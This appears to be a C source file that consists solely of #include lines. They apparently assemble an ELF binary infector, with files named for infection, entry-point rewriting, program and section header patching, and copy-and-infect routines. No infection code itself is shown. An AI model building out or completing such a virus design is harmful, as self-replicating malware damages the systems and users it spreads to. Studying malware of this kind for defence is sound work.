#include "src/one_step_closer/trace_infector.h"
#include "src/one_step_closer/prefix.inc"

#include "infection.inc"

#include "src/one_step_closer/write_infection.inc"
#include "src/one_step_closer/suffix.inc"

#include "src/additional_cs/new_entry_addr.inc"
#include "src/additional_cs/patch_phdr.inc"
#include "src/additional_cs/patch_shdr.inc"
#include "src/additional_cs/copy_and_infect.inc"
